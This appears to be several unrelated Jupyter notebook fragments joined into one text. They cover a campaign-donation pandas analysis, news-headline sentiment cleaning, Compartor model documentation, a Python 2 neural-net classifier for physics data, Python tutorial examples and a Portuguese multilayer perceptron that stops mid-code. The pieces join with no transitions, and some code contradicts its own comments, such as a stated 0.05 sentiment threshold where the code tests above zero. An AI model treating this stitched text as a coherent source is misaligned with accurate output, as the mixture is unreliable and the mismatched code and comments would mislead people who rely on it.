donor_df.groupby('Party')['contb_receipt_amt'].sum().plot(kind='bar')Looks like Obama couldn't compete against all the republicans, but he certainly has the advantage of their funding being splintered across multiple candidates. Finally to start closing out the project, let's look at donations and who they came from (as far as occupation is concerned). We will start by grabing the occupation information from the dono_df DataFrame and then using pivot_table to make the index defined by the various occupations and then have the columns defined by the Party (Republican or Democrat). FInally we'll also pass an aggregation function in the pivot table, in this case a simple sum function will add up all the comntributions by anyone with the same profession.# Use a pivot table to extract and organize the data by the donor occupation occupation_df = donor_df.pivot_table('contb_receipt_amt', index='contbr_occupation', columns='Party', aggfunc='sum') # Let's go ahead and check out the DataFrame occupation_df.head()Great! Now let's see how big the DataFrame is.# Check size occupation_df.shapeWow! This is probably far too large to display effectively with a small, static visualization. What we should do is have a cut-off for total contribution amounts. Afterall, small donations of 20 dollars by one type of occupation won't give us too much insight. So let's set our cut off at 1 million dollars.# Set a cut off point at 1 milllion dollars of sum contributions occupation_df = occupation_df[occupation_df.sum(1) > 1000000] # Now let's check the size! occupation_df.shapeGreat! This looks much more manageable! Now let's visualize it.# plot out with pandas occupation_df.plot(kind='bar')This is a bit hard to read, so let's use kind = 'barh' (horizontal) to set the ocucpation on the correct axis.# Horizontal plot, use a convienently colored cmap occupation_df.plot(kind='barh',figsize=(10,12),cmap='seismic')Looks like there are some occupations that are either mislabeled or aren't really occupations. Let's get rid of: Information Requested occupations and let's combine CEO and C.E.O.# Drop the unavailble occupations occupation_df.drop(['INFORMATION REQUESTED PER BEST EFFORTS','INFORMATION REQUESTED'],axis=0,inplace=True)Now let's combine the CEO and C.E.O rows.# Set new ceo row as sum of the current two occupation_df.loc['CEO'] = occupation_df.loc['CEO'] + occupation_df.loc['C.E.O.'] # Drop CEO occupation_df.drop('C.E.O.',inplace=True)Now let's repeat the same plot!# Repeat previous plot! occupation_df.plot(kind='barh',figsize=(10,12),cmap='seismic')About the dataThe given dataset contains a large number of News Article Headlines mapped together with itsSentiment Score and their respective social feedback on multiple platforms. The collected data accounts about 93239 news items on four different topics: Economy, Microsoft, Obama and Palestine. (UCI Machine Learning Repository, n.d.)The attributes present in the dataset are:- **IDLink (numeric):** Unique identifier of news items- **Title (string):** Title of the news item according to the official media sources- **Headline (string):** Headline of the news item according to the official media sources- **Source (string):** Original news outlet that published the news item- **Topic (string):** Query topic used to obtain the items in the official media sources- **PublishDate (timestamp):** Date and time of the news items' publication- **SentimentTitle (numeric):** Sentiment score of the text in the news items' title- **SentimentHeadline (numeric):** Sentiment score of the text in the news items' headline- **Facebook (numeric):** Final value of the news items' popularity according to the social media source Facebook- **GooglePlus (numeric):** Final value of the news items' popularity according to the social media source Google+- **LinkedIn (numeric):** Final value of the news items' popularity according to the social media source LinkedInFor this project the Title and SentimentTitle attributes will only be used and news related to Microsoft will be removed as it is more tech centric and it is quite irrelevant in the context of Nepal.# Data with neutral sentiment news_df = news_df[news_df['SentimentHeadline'] != 0] # Data with positive sentiment news_df[news_df['SentimentHeadline'] > 0].shape # Data with negative sentiment news_df[news_df['SentimentHeadline'] < 0].shapeIt seems like there is almost thrice more negative news(while considering neural news as negative) than postive news. Data Preprocessing#Dropping news related to microsoft news_df = news_df[news_df['Topic'] != "microsoft"] #Removing the irreleant columns news_df = news_df[['Headline', 'SentimentHeadline']] news_df.info() # In general sentiment score above 0.05 are considered positive # And since we are only interested in filtering good news or positive news # We will label score above 0.05 as postive and any score below it as negative def is_positive(sentiment_score): if sentiment_score > 0: return 1 else: return 0 news_df['Is_SentimentHeadline_Positive'] = news_df['SentimentHeadline'].apply(is_positive) # Removing SentimentHeadline column news_df = news_df[['Headline','Is_SentimentHeadline_Positive']] news_df.head()Text Preprocessing# Removing Punctuations and converting all word to lowercase import string import nltk def remove_proper_noun(text): text = nltk.tag.pos_tag(text.split()) edited_text = [word for word,tag in text if tag != 'NNP' and tag != 'NNPS'] return ' '.join(edited_text) def remove_punctuation(text): text = remove_proper_noun(text) no_punctuation_text = ''.join([i for i in str(text) if i not in string.punctuation]) return no_punctuation_text.lower() news_df['Headline'] = news_df['Headline'].apply(remove_punctuation) news_df.head() import spacy nlp = spacy.load("en_core_web_sm") import re def remove_nonwords(str_): return re.sub("[^A-Za-z ]\w+[^A-Za-z]*", ' ', str_) # Lemmatization and Removing stop words and non words def text_preprocessing(text): text = remove_nonwords(text) tokenized_text = [token.lemma_ for token in nlp(text)] no_stopwords_list = [i.lower() for i in tokenized_text if i not in nlp.Defaults.stop_words] lemma_text = ' '.join(no_stopwords_list) return lemma_text # Preprocessing the Headline text news_df['Headline'] = news_df['Headline'].apply(text_preprocessing) news_df.head() # Removing all Null news_df = news_df[news_df['Headline'].notnull()] # Dropping all Nan news_df = news_df.dropna() # dropping ALL duplicte values news_df.drop_duplicates(subset ="Headline", keep = False, inplace = True) news_df.to_csv("../Data/Clean_data.csv", index=False)How to define a compartment population model in Compartor $$\def\n{\mathbf{n}}\def\x{\mathbf{x}}\def\N{\mathbb{\mathbb{N}}}\def\X{\mathbb{X}}\def\NX{\mathbb{\N_0^\X}}\def\C{\mathcal{C}}\def\Jc{\mathcal{J}_c}\def\DM{\Delta M_{c,j}}\newcommand\diff{\mathop{}\!\mathrm{d}}\def\Xc{\mathbf{X}_c}\def\Yc{\mathbf{Y}_c}\newcommand{\muset}[1]{\dot{\{}1\dot{\}}}$$ Whenever using Compartor in a Jupyter notebook, run the following commands:# initialize sympy printing (for latex output) from sympy import init_printing, Symbol init_printing() # import functions and classes for compartment models from compartor import *Usage of the constructor TransitionClassThe population dynamics are specified in Compartor through a set of transition classes. These are stoichiometric-like equations whose left-hand and right-hand sides specify how some `Compartments` are modified by the occurrence of a transition.To define a compartment $[\x]$, it is first necessary to define some `Content` variables $\x \in \N_0^D$ that Compartor can interpret as symbols on which to perform symbolic computation. For instance,x = Content('x') y = Content('y') Compartment(x)Content variables are $D$-dimensional, with `x[d]` denoting the copy number of chemical species `d`, for $d=0,1,...,D-1$ .Once some content variables have been defined, the fastest way to define a transition class is the constructor `TransitionClass`. For instance,Exit = TransitionClass( [x] -to> {}, 'k_E', name='E') display(Exit)defines a transition class that randomly removes one compartment from the population with rate $k_E$. In particular:* The first argument of `TransitionClass` is the compartment stoichiometry, where lelf-hand side and right-hand side are separated by the keyword `-to>`. The notation `[x]` denotes a compartment of content `x`, while `{}` denotes the empty set.* The second argument assignes a name to the rate constant * The optional parameter `name` defines the subscript of the transition propensity Similarly, we can define a transition class that randomly fuses two compartments as followsFusion = TransitionClass( [x] + [y] -to> [x+y], 'k_F', name='F') display(Fusion)Note that the population dependency of the propensity `h` is automatically inferred with the law of mass action. Note that in the compartment notation we can use compound expressions inside compartment brackets. In the above example, we have used `x+y` to denote the content formed by adding content vectors `x` and `y`.Content vectors can be also notated explicitly as $D$-tuples, listing the copy number of each chemical species $d=0,1,...,D-1$.For example, in the expression `[x + (-1, 0)]`, the tuple `(-1, 0)` denotes a change by $-1$ in chemical species $d=0$ (in a model with $D=2$ species). The expression could be equivalently written as `[(x[0]-1,x[1])]`. We will see more examples of this notation below. Propensities with content dependencyIt is possible to tune the propensity as a function of the compartment contents by providing a third argument to `TransitionClass`, such as for the following chemical events given in the example of the paper:Conversion = TransitionClass( [x] -to> [x + (-1,1)], 'k_c', x[0], name='c') Degradation = TransitionClass( [x] -to> [x + (0,-1)], 'k_d', x[1], name='d') display(Conversion, Degradation)The Conversion class transforms the first chemical species (indexed by `0`) to the second type with propensity $k_cx_0$ in any compartment across the population. The Degradation class, instead, removes one molecule of the second chemical species with rate $k_dx_1$, for a given compartment. Some transition classes involve compartments on the product side (i.e. right-hand side) whose content is drawn in probabilistic fashion with respect to the reactant compartments. In such cases, a conditional distribution can be passed as optional argument `pi` in `TransitionClass`. The type of $\pi$ is `OutcomeDistribution`, which is a class comprising* an expression or symbol to use for displaying $\pi$ in compound expressions* a function `expectation` that takes an expression over reactant contents, and returns its expectation over all product compartment variables.There are generators for several predefined outcome distributions. If nothing is specified, as in the above "Exit" transition example, `OutcomeDistribution.Identity()` is used by default. Instead, when the content of product compartments follows a distribution, other generators can be used or created.Compartor currently includes the following `OutcomeDistribution` generators* `Poisson()` * `NegativeBinomial()` * `Uniform()` For example, the model in the paper has an "Intake" transition class where new compartments are created with Poisson-distributed contentfrom sympy import Symbol pi_I = OutcomeDistribution.Poisson(Symbol('\pi_{I}(y; \lambda)'),y[0],Symbol('\lambda')) Intake = TransitionClass( {} -to> [(y[0],0)], 'k_I', pi=pi_I, name='I') display(Intake)Model definitionThe declaration of a model consists in defining a list of transition classes. We provide some examples of model declaration here below. Example: case study shown in the paperx = Content('x') y = Content('y') # Intake Distribution pi_I = OutcomeDistribution.Poisson(Symbol('\pi_{I}(y; \lambda)'),y[0],Symbol('\lambda')) Intake = TransitionClass( {} -to> [(y[0],0)], 'k_I', pi=pi_I, name='I') Fusion = TransitionClass( [x] + [y] -to> [x+y], 'k_F', name='F') Conversion = TransitionClass( [x] -to> [x + (-1,1)], 'k_c', x[0], name='c') Degradation = TransitionClass( [x] -to> [x + (0,-1)], 'k_d', x[1], name='d') transitions = [ Intake, Fusion, Conversion, Degradation]The transition classes stored into the variable `transitions` can be displayed with the function `display_transition_classes()` as followsdisplay_transition_classes(transitions)Example: nested birth-death processx = Content('x') y = Content('y') # Intake pi_I = OutcomeDistribution.NegativeBinomial(Symbol('\pi_{NB}(y; \lambda)'), y[0],Symbol('r'),Symbol('p')) Intake = TransitionClass( {} -to> [y], 'k_I', pi=pi_I, name='I') Exit = TransitionClass( [x] -to> {}, 'k_E', name='E') Birth = TransitionClass( [x] -to> [x+1], 'k_b', name='b') Death = TransitionClass( [x] -to> [x-1], 'k_d', x[0], name='d') transitions = [Intake, Exit, Birth, Death] display_transition_classes(transitions)Example: coagulation-fragmentation system with intake and exportx = Content('x') y = Content('y') pi_I = OutcomeDistribution.Poisson(Symbol("\pi_{Poiss}(y; \lambda)"), y[0], Symbol("\lambda")) pi_F = OutcomeDistribution.Uniform(Symbol("\pi_F(y|x)"), y[0], 0, x[0]) Intake = TransitionClass( {} -to> [y], 'k_I', pi=pi_I, name='I') Exit = TransitionClass( [x] -to> {}, 'k_E', name='E') Coagulation = TransitionClass( [x] + [y] -to> [x+y], 'k_C', name='C') Fragmentation = TransitionClass( [x] -to> [y] + [x-y], 'k_F', g=x[0], pi=pi_F, name='F') transitions = [Intake, Exit, Coagulation, Fragmentation] display_transition_classes(transitions)Task 2from sklearn.externals import joblib from scipy.stats import ks_2samp import numpy as np import datetime from sklearn.neural_network import MLPClassifier def getData(signal_filename, backgorund_filename): """ :return: shuffled data """ sig_data = np.asarray(joblib.load(signal_filename)) bkg_data = np.asarray(joblib.load(backgorund_filename)) np.random.shuffle(sig_data) np.random.shuffle(bkg_data) return sig_data, bkg_data class Data: def __init__(self, trainFraction, feature1_idx, feature2_idx, sigLabel=-1, bkgLabel=1, signal_filename='./HEPDrone/data/signal_data.p', backgorund_filename='./HEPDrone/data/background_data.p'): """ :param trainFraction: float in (0,1) :param feature1_idx: int in [0,5] :param feature2_idx: int in [0,5] :param sigLabel :param bkgLabel """ sig_data, bkg_data = getData(signal_filename, backgorund_filename) cutIndex = int(trainFraction * len(sig_data)) self._sigTrain = sig_data[: cutIndex,:] np.random.shuffle(self._sigTrain) self._sigTest = sig_data[cutIndex:,:] self._bkgTrain = bkg_data[: cutIndex] np.random.shuffle(self._bkgTrain) self._bkgTest = bkg_data[cutIndex:,:] self._sigLabel = sigLabel self._bkgLabel = bkgLabel self._feature1_idx = feature1_idx self._feature2_idx = feature2_idx def set_feature_indexes(self, feature1_idx, feature2_idx): self._feature1_idx = feature1_idx self._feature2_idx = feature2_idx def shuffle(self): np.random.shuffle(self._sigTrain) np.random.shuffle(self._bkgTrain) def get_sigTrain(self): return self._sigTrain[:, (self._feature1_idx, self._feature2_idx)] def get_sigTest(self): return self._sigTest[:, (self._feature1_idx, self._feature2_idx)] def get_bkgTrain(self): return self._bkgTrain[:, (self._feature1_idx, self._feature2_idx)] def get_bkgTest(self): return self._bkgTest[:, (self._feature1_idx, self._feature2_idx)] def get_sigLabel(self): return self._sigLabel def get_bkgLabel(self): return self._bkgLabel class Trainer: @staticmethod def train(hidden_layer_sizes, lr_init, dataObject, verbose): """ Trains a classifier :param hidden_layer_sizes: tuple of zies: (100, 100) :param lr_init: initial learning rate: 0.3 :return classifier """ mlp = MLPClassifier(activation='relu', alpha=1e-05, batch_size=200, beta_1=0.9, beta_2=0.999, epsilon=1e-08, hidden_layer_sizes=hidden_layer_sizes, learning_rate_init=lr_init, random_state=1, shuffle=True, solver='adam', tol=0.00001, early_stopping=False, validation_fraction=0.1, verbose=verbose, warm_start=False) X = np.append(dataObject.get_sigTrain(), dataObject.get_bkgTrain(), axis=0) y = [dataObject.get_sigLabel()] * len(dataObject.get_sigTrain()) + [dataObject.get_bkgLabel()] * len(dataObject.get_bkgTrain()) mlp.fit(X, y) return mlp @staticmethod def evaluate(classifier, dataObject, verbose): """ :param classifier: MLPClassifier :return: test_accuracy """ if len(dataObject.get_sigTrain()) != 0: predictions = [] for entry in dataObject.get_sigTrain(): predictions.append(classifier.predict([entry])[0]) train_accuracy = predictions.count(dataObject.get_sigLabel()) / float(len(predictions)) predictions = [] for entry in dataObject.get_sigTest(): predictions.append(classifier.predict([entry])[0]) test_accuracy_sig = predictions.count(dataObject.get_sigLabel()) / float(len(predictions)) if verbose: if len(dataObject.get_sigTrain()) != 0: print "Signal train accuracy: " + str(train_accuracy) print "Signal test accuracy: " + str(test_accuracy_sig) if len(dataObject.get_bkgTrain()) != 0: predictions = [] for entry in dataObject.get_bkgTrain(): predictions.append(classifier.predict([entry])[0]) train_accuracy = predictions.count(dataObject.get_bkgLabel()) / float(len(predictions)) predictions = [] for entry in dataObject.get_bkgTest(): predictions.append(classifier.predict([entry])[0]) test_accuracy_bkg = predictions.count(dataObject.get_bkgLabel()) / float(len(predictions)) if verbose: if len(dataObject.get_bkgTrain()) != 0: print "Background train accuracy: " + str(train_accuracy) print "Background test accuracy: " + str(test_accuracy_bkg) return (test_accuracy_bkg+test_accuracy_sig) / 2 @staticmethod def predict_test_data(classifier, dataObject, verbose): """ :param classifier: MLPClassifier :return: test_accuracy """ testSample = [] predictions_signal = [] for entry in dataObject.get_sigTest(): probability = float(classifier.predict_proba([entry])[0][0]) predictions_signal.append(classifier.predict([entry])[0]) testSample.append(probability) test_accuracy_sig = predictions_signal.count(dataObject.get_sigLabel()) / float(len(predictions_signal)) if verbose: print "Signal test accuracy: " + str(test_accuracy_sig) testSample = [] predictions_background = [] for entry in dataObject.get_bkgTest(): probability = float(classifier.predict_proba([entry])[0][0]) predictions_background.append(classifier.predict([entry])[0]) testSample.append(probability) test_accuracy_bkg = predictions_background.count(dataObject.get_bkgLabel()) / float(len(predictions_background)) if verbose: print "Background test accuracy: " + str(test_accuracy_bkg) return (test_accuracy_bkg+test_accuracy_sig) / 2, predictions_signal, dataObject._sigTest, predictions_background, dataObject._bkgTest @staticmethod def saveClassifier(classifier, filename): joblib.dump(classifier, filename ) print 'Classifier saved to file' @staticmethod def loadClassifier(filename): classifier = joblib.load(filename ) return classifier def train_N(N, layer_sizes, lr_init, dataObject, verbose): accuracy_setting_history = [] for _ in range(N): classifier = Trainer.train(layer_sizes,lr_init, dataObject, verbose) accuracy = Trainer.evaluate(classifier, dataObject, verbose) accuracy_setting_history.append(accuracy) candidate = sum(accuracy_setting_history)/N return classifier, candidate def hyperparameter_search(): trainFraction_ = 0.5 hidden_layer_sizes_ = (100, 100) lr_init_ = 0.3 histories_indexes_ = [] best_average_accuracy_ = 0 best_feature1_idx_ = -1 best_feature2_idx_ = -1 dataObject_ = Data(trainFraction_, best_feature1_idx_, best_feature2_idx_) for feature1_idx_ in range(6): for feature2_idx_ in range(feature1_idx_+1, 6): dataObject_.set_feature_indexes(feature1_idx_, feature2_idx_) _, candidate_ = train_N(1, hidden_layer_sizes_, lr_init_, dataObject_, verbose=False) dataObject_.shuffle() if candidate_ > best_average_accuracy_: best_average_accuracy_ = candidate_ best_feature1_idx_ = feature1_idx_ best_feature2_idx_ = feature2_idx_ histories_indexes_.append([feature1_idx_, feature2_idx_, candidate_]) print(histories_indexes_) #print "(feature1, feature2, AP)" #print histories_indexes_ print "Best feature indexes "+ str(best_feature1_idx_) + " " + str(best_feature2_idx_) #print "Best accuracy " + str(best_average_accuracy_) network_dims_ = [(200, 200), (10,10), (20,20,20,20), (100, 40, 20, 10)] histories_hidden_sizes_ = [] best_sizes_ = None best_average_accuracy_ = 0 dataObject_.set_feature_indexes(best_feature1_idx_, best_feature2_idx_) for hidden_sizes_ in network_dims_: _, candidate_ = train_N(1, hidden_sizes_, lr_init_, dataObject_, verbose=False) dataObject_.shuffle() if candidate_ > best_average_accuracy_: best_average_accuracy_ = candidate_ best_sizes_ = hidden_sizes_ histories_hidden_sizes_.append([hidden_sizes_, candidate_]) print(histories_hidden_sizes_) #print "((hidden layer sizes), AP)" #print histories_hidden_sizes_ print "Best hidden layer size " + str(best_sizes_) return best_feature1_idx_, best_feature2_idx_, best_sizes_1. Training a Input Model ( Neural Network that is taught on the signal ) Skip following 3 cells if you don't wanna train and search hyperparametersbest_feature1_idx_, best_feature2_idx_, best_sizes_ = hyperparameter_search() print (best_feature1_idx_, best_feature2_idx_, best_sizes_) def save_best_model(train_fraction, best_feature1_idx_, best_feature2_idx_, best_sizes_, signal_filename_,background_filename_, lr_init_): dataObject_ = Data(train_fraction_, best_feature1_idx_, best_feature2_idx_, signal_filename=signal_filename_,backgorund_filename=background_filename_) dataObject_.set_feature_indexes(best_feature1_idx_, best_feature2_idx_) best_classifier_ = Trainer.train(best_sizes_, lr_init_, dataObject_, verbose=False) best_accuracy_ = Trainer.evaluate(best_classifier_, dataObject_, verbose=False) print "Best model accuracy: " + str(best_accuracy_) Trainer.saveClassifier(best_classifier_,'best_classifier2_aux.pkl') signal_filename_ = './HEPDrone/data/signal_data.p' background_filename_ = './HEPDrone/data/background_data.p' train_fraction_ = 0.95 lr_init_ = 0.3 best_sizes_ = (200, 200) save_best_model(train_fraction_, best_feature1_idx_, best_feature2_idx_, best_sizes_, signal_filename_,background_filename_, lr_init_)Best model accuracy: 0.899 Classifier saved to fileRun from here if you want to evaluate best model on new data with the same format the filenames with filepaths should be sent as parameters: signal file path, background file pathdef evaluate_best_classifier_on_new_data(signal_filename, backgorund_filename, classifier_filename): dataObject_ = Data(trainFraction=0, feature1_idx=2, feature2_idx=3, signal_filename=signal_filename, backgorund_filename=backgorund_filename) loaded_class_ = Trainer.loadClassifier(classifier_filename) accuracy_ = Trainer.evaluate(loaded_class_, dataObject_, verbose=True) print "Accuracy: "+str(accuracy_) evaluate_best_classifier_on_new_data('./HEPDrone/data/signal_data.p', './HEPDrone/data/background_data.p', 'best_classifier2_aux.pkl')Signal test accuracy: 0.9286 Background test accuracy: 0.8659 Accuracy: 0.89725More Control Flow ToolsCopied codes from [Python tutorial](https://docs.python.org/3/tutorial/controlflow.html). `if` Statementsx = int(input("Please enter an integer: ")) if x < 0: x = 0 print('Negative changed to zero') elif x == 0: print('Zero') elif x == 1: print('Single') else: print('More')Single`for` StatementsThe `for` statement in Python differs a bit from what you may be used to in C or Pascal. Rather than always iterating over an arithmetic progression of numbers (like in Pascal), or giving the user the ability to define both the iteration step and halting condition (as C), Python’s `for` statement iterates over the items of any sequence (a list or a string), in the order that they appear in the sequence. For example (no pun intended):# Measure some strings: words = ['cat', 'window', 'defenestrate'] for w in words: print(w, len(w))cat 3 window 6 defenestrate 12If you need to modify the sequence you are iterating over while inside the loop (for example to duplicate selected items), it is recommended that you first make a copy. Iterating over a sequence does not implicitly make a copy. The slice notation makes this especially convenient:for w in words[:]: # Loop over a slice copy of the entire list. if len(w) > 6: words.insert(0, w) wordsWith `for w in words:`, the example would attempt to create an infinite list, inserting `defenestrate` over and over again. The `range` Functionfor i in range(5): print(i)0 1 2 3 4_other ranges:_```range(5, 10) 5, 6, 7, 8, 9range(0, 10, 3) 0, 3, 6, 9range(-10, -100, -30) -10, -40, -70```a = ['Mary', 'had', 'a', 'little', 'lamb'] for i in range(len(a)): print(i, a[i]) print(range(10)) list(range(5))`break` and `continue` Statements, and `else` Clauses on Loopsfor n in range(2, 10): for x in range(2, n): if n % x == 0: print(n, 'equals', x, '*', n//x) break else: # loop fell through without finding a factor print(n, 'is a prime number')2 is a prime number 3 is a prime number 4 equals 2 * 2 5 is a prime number 6 equals 2 * 3 7 is a prime number 8 equals 2 * 4 9 equals 3 * 3When used with a loop, the `else` clause has more in common with the `else` clause of a `try` statement than it does that of `if` statements: a `try` statement’s `else` clause runs when no exception occurs, and a loop’s `else` clause runs when no `break` occurs.for num in range(2, 10): if num % 2 == 0: print("Found an even number", num) continue print("Found a number", num)Found an even number 2 Found a number 3 Found an even number 4 Found a number 5 Found an even number 6 Found a number 7 Found an even number 8 Found a number 9`pass` Statementsclass MyEmptyClass: pass def initlog(*args): pass # Remember to implement this!Defining Functionsdef fib(n): # write Fibonacci series up to n """Print a Fibonacci series up to n.""" a, b = 0, 1 while a < n: print(a, end=' ') a, b = b, a+b print() # Now call the function we just defined: fib(2000) fib f = fib f(100) fib(0) print(fib(0)) # functions that don't return, return None. def fib2(n): # return Fibonacci series up to n """Return a list containing the Fibonacci series up to n.""" result = [] a, b = 0, 1 while a < n: result.append(a) # see below a, b = b, a+b return result f100 = fib2(100) # call it f100 # write the resultMore on Defining Functions Default Argument Valuesdef ask_ok(prompt, retries=4, reminder='Please try again!'): while True: ok = input(prompt) if ok in ('y', 'ye', 'yes'): return True if ok in ('n', 'no', 'nop', 'nope'): return False retries = retries - 1 if retries < 0: raise ValueError('invalid user response') print(reminder)This function can be called in several ways: - giving only the mandatory argument: `ask_ok('Do you really want to quit?')` - giving one of the optional arguments: `ask_ok('OK to overwrite the file?', 2)` - or even giving all arguments: `ask_ok('OK to overwrite the file?', 2, 'Come on, only yes or no!')`This example also introduces the in keyword. This tests whether or not a sequence contains a certain value.The default values are evaluated at the point of function definition in the defining scope, so thati = 5 def f(arg=i): print(arg) i = 6 f() # will print 55**Important warning:** The default value is evaluated only once. This makes a difference when the default is a mutable object such as a list, dictionary, or instances of most classes. For example, the following function accumulates the arguments passed to it on subsequent calls:def f(a, L=[]): L.append(a) return L print(f(1)) print(f(2)) print(f(3))[1] [1, 2] [1, 2, 3]If you don’t want the default to be shared between subsequent calls, you can write the function like this instead:def f(a, L=None): if L is None: L = [] L.append(a) return L print(f(1)) print(f(2)) print(f(3))[1] [2] [3]Keyword Argumentsdef parrot(voltage, state='a stiff', action='voom', type='Norwegian Blue'): print("-- This parrot wouldn't", action, end=' ') print("if you put", voltage, "volts through it.") print("-- Lovely plumage, the", type) print("-- It's", state, "!") parrot(1000) # 1 positional argument parrot(voltage=1000) # 1 keyword argument parrot(voltage=1000000, action='VOOOOOM') # 2 keyword arguments parrot(action='VOOOOOM', voltage=1000000) # 2 keyword arguments parrot('a million', 'bereft of life', 'jump') # 3 positional arguments parrot('a thousand', state='pushing up the daisies') # 1 positional, 1 keyword parrot() # required argument missing parrot(voltage=5.0, 'dead') # non-keyword argument after a keyword argument parrot(110, voltage=220) # duplicate value for the same argument parrot(actor='') # unknown keyword argument def function(a): pass function(0, a=0)Arbitrary Argument Listsdef cheeseshop(kind, *arguments, **keywords): print("-- Do you have any", kind, "?") print("-- I'm sorry, we're all out of", kind) for arg in arguments: print(arg) print("-" * 40) for kw in keywords: print(kw, ":", keywords[kw]) cheeseshop("Limburger", "It's very runny, sir.", "It's really very, VERY runny, sir.", shopkeeper="", client="", sketch="Cheese Shop Sketch") def concat(*args, sep="/"): return sep.join(args) concat("earth", "mars", "venus") concat("earth", "mars", "venus", sep=".")Unpacking Argument ListsThe reverse situation occurs when the arguments are already in a list or tuple but need to be unpacked for a function call requiring separate positional arguments. For instance, the built-in `range()` function expects separate _start_ and _stop_ arguments. If they are not available separately, write the function call with the `*`-operator to unpack the arguments out of a list or tuple. In the same fashion, dictionaries can deliver keyword arguments with the `**`-operatorlist(range(3, 6)) # normal call with separate arguments args = [3, 6] list(range(*args)) # call with arguments unpacked from a list def parrot(voltage, state='a stiff', action='voom'): print("-- This parrot wouldn't", action, end=' ') print("if you put", voltage, "volts through it.", end=' ') print("E's", state, "!") d = {"voltage": "four million", "state": "bleedin' demised", "action": "VOOM"} parrot(**d)-- This parrot wouldn't VOOM if you put four million volts through it. E's bleedin' demised !Lambda ExpressionsSmall anonymous functions. They can be returned from other functions or accepted as arguments.def make_incrementor(n): return lambda x: x + n f = make_incrementor(42) f(0) f(1) pairs = [(1, 'one'), (2, 'two'), (3, 'three'), (4, 'four')] pairs.sort(key=lambda pair: pair[1]) pairsConstruindo Um Algoritmo Para Rede Neural Multilayer Perceptron Otimização com Stochastic Gradient Descent Stochastic Gradient Descent (SGD) é uma versão de Gradient Descent, onde em cada passagem para a frente, obtemos um lote de dados com amostras aleatórias do conjunto de dados total. Aqui onde entra em cena o batch_size. Esse é o tamanho do lote. Idealmente, todo o conjunto de dados seria alimentado na rede neural em cada passagem para a frente, mas na prática isso acaba não sendo possível, devido a restrições de memória. SGD é uma aproximação de Gradient Descent, quanto mais lotes processados pela rede neural, melhor será a aproximação. Uma implementação do SGD envolve:1. Gerar lotes de dados de amostras aleatórias do conjunto de dados total.2. Executar a rede para frente (Forward Pass) e para trás (Backward pass) para calcular o gradiente (com dados de (1)).3. Aplicar a atualização de descida do gradiente.4. Repitir as etapas 1-3 até a convergência ou o loop for parado por outro mecanismo (como o número de épocas, por exemplo).Se tudo correr bem, a perda da rede vai diminuindo, indicando pesos e bias mais úteis ao longo do tempo.import numpy as np class Neuronio: """ Classe base para os nós da rede. Argumentos: "nodes_entrada": Uma lista de nós com arestas para este nó. """ def __init__(self, nodes_entrada = []): """ O construtor do nó (é executado quando o objeto é instanciado). Define propriedades que podem ser usadas por todos os nós. """ # Lista de nós com arestas para este nó. self.nodes_entrada = nodes_entrada # Lista de nós para os quais este nó gera saída. self.nodes_saida = [] # O valor calculado por este nó. É definido executando o método forward(). self.valor = None # Este objeto é um dicionário com pares chaves/valor entre {} # As chaves (keys) são os inputs para este nó e o valores (values) são as paciais deste nó em relação ao input. self.gradientes = {} # Configuramos este nó como um nó de saída para todos os nós de entrada. for n in nodes_entrada: n.nodes_saida.append(self) def forward(self): """ Todo o nó que usar essa classe como uma classe base, precisa definir seu próprio método "forward". """ raise NotImplementedError def backward(self): """ Todo o nó que usar essa classe como uma classe base, precisa definir seu próprio método "backward". """ raise NotImplementedError class Input(Neuronio): """ Input genérico para a rede. """ def __init__(self): # O construtor da classe base deve ser executado para configurar todas as propriedades aqui. # # A propriedade mais importante de Input é valor. # self.valor é definido na função topological_sort(). Neuronio.__init__(self) def forward(self): # Nada a ser feito aqui. pass def backward(self): # Um nó de Input não possui entradas (pois ele já é a entrada) e assim o gradiente (derivada) é zero. # A palavra reservada "self", é referência para este objeto. self.gradientes = {self: 0} # Pesos e bias podem ser inputs, assim precisamos somar o gradiente de outros gradientes de saída for n in self.nodes_saida: self.gradientes[self] += n.gradientes[self] class Linear(Neuronio): """ Representa um nó que realiza transformação linear. """ def __init__(self, X, W, b): # O construtor da classe base (nó). # Pesos e bias são tratados como nós de entrada (nodes_entrada). Neuronio.__init__(self, [X, W, b]) def forward(self): """ Executa a matemática por trás da transformação linear. """ X = self.nodes_entrada[0].valor W = self.nodes_entrada[1].valor b = self.nodes_entrada[2].valor self.valor = np.dot(X, W) + b def backward(self): """ Calcula o gradiente com base nos valores de saída. """ # Inicializa um parcial para cada um dos nodes_entrada. self.gradientes = {n: np.zeros_like(n.valor) for n in self.nodes_entrada} # Ciclo através dos outputs. # O gradiente mudará dependendo de cada output, assim os gradientes são somados sobre todos os outputs. for n in self.nodes_saida: # Obtendo parcial da perda em relação a este nó. grad_cost = n.gradientes[self] # Definindo o parcial da perda em relação às entradas deste nó. self.gradientes[self.nodes_entrada[0]] += np.dot(grad_cost, self.nodes_entrada[1].valor.T) # Definindo o parcial da perda em relação aos pesos deste nó. self.gradientes[self.nodes_entrada[1]] += np.dot(self.nodes_entrada[0].valor.T, grad_cost) # Definindo o parcial da perda em relação ao bias deste nó. self.gradientes[self.nodes_entrada[2]] += np.sum(grad_cost, axis = 0, keepdims = False) class Sigmoid(Neuronio): """ Representa o nó da função de ativação Sigmoid. """ def __init__(self, node): # O construtor da classe base. Neuronio.__init__(self, [node]) def _sigmoid(self, x): """ Este método é separado do `forward` porque ele também será usado com "backward". `x`: Um array Numpy. """ return 1. / (1. + np.exp(-x)) def forward(self): """ Executa a função _sigmoid e define a variável self.valor """ input_value = self.nodes_entrada[0].valor self.valor = self._sigmoid(input_value) def backward(self): """ Calcula o gradiente usando a derivada da função sigmoid O método backward da classe Sigmoid, soma as derivadas (é uma derivada normal quando há apenas uma variável) em relação à única entrada sobre todos os nós de saída. """ # Inicializa os gradientes com zero. self.gradientes = {n: np.zeros_like(n.valor) for n in self.nodes_entrada} # Soma a parcial em relação ao input sobre todos os outputs. for n in self.nodes_saida: grad_cost = n.gradientes[self] sigmoid = self.valor self.gradientes[self.nodes_entrada[0]] += sigmoid * (1 - sigmoid) * grad_cost class MSE(Neuronio): def __init__(self, y, a): """ Função de custo para calcular o erro médio quadrático. Deve ser usado como último nó da rede. """ # Chamada ao construtor da classe base. Neuronio.__init__(self, [y, a]) def forward(self): """ Calcula o erro médio ao quadrado. """ # Fazemos o reshape para evitar possíveis problemas nas operações de matrizes/vetores # # Convertendo os 2 arrays (3,1) garantimos que o resultado será (3,1) e, assim, # teremos uma subtração elementwise. y = self.nodes_entrada[0].valor.reshape(-1, 1) a = self.nodes_entrada[1].valor.reshape(-1, 1) self.m = 